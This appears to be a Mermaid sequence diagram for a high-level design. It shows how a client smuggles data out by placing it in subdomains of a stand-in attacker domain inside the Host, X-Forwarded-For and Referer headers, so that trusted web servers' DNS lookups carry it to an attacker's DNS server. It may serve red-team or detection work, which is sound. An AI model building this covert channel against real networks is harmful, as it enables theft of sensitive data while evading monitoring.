Web Headers (HLD)

sequenceDiagram participant Client as Exfil System participant WebServer as Trusted Webservers participant DNS as DNS Server - Exfil Collect Client->>WebServer: HTTP Requests to high-integrity domains Note left of WebServer: Headers: Host: secretmessage1.exfil.com Note left of WebServer: Headers: X-Forward-For: secretmessage2.exfil.com Note left of WebServer: Headers: Referer: secretmessage3.exfil.com Note right of WebServer: Incoming HTTP requests delivered to trusted webserver, containing sensitive exfiltrated data in headers Note right of WebServer: Headers: Host: secretmessage1.exfil.com Note right of WebServer: Headers: X-Forward-For: secretmessage2.exfil.com Note right of WebServer: Headers: Referer: secretmessage3.exfil.com WebServer-->>Client: HTTP Response Note right of WebServer: Confirms receipt of HTTP request with sensitive data in the headers alt Hostname Lookup Solicitation WebServer->>DNS: Lookup secretmessage1.exfil.com Note right of DNS: Exfiltration Data Received (Hostname: secretmessage1.exfil.com) DNS-->>WebServer: IP for secretmessage1.exfil.com Note right of WebServer: Received IP address corresponding to secretmessage1.exfil.com WebServer->>DNS: Lookup secretmessage2.exfil.com Note right of DNS: Exfiltration Data Received (Hostname: secretmessage2.exfil.com) DNS-->>WebServer: IP for secretmessage2.exfil.com Note right of WebServer: Received IP address corresponding to secretmessage2.exfil.com WebServer->>DNS: Lookup secretmessage3.exfil.com Note right of DNS: Exfiltration Data Received (Hostname: secretmessage3.exfil.com) DNS-->>WebServer: IP for secretmessage3.exfil.com Note right of WebServer: Received IP address corresponding to secretmessage3.exfil.com end WebServer-->>Client: DNS Resolution Complete Note right of WebServer: Web server returns the final HTTP response to the client, confirming successful hostname lookups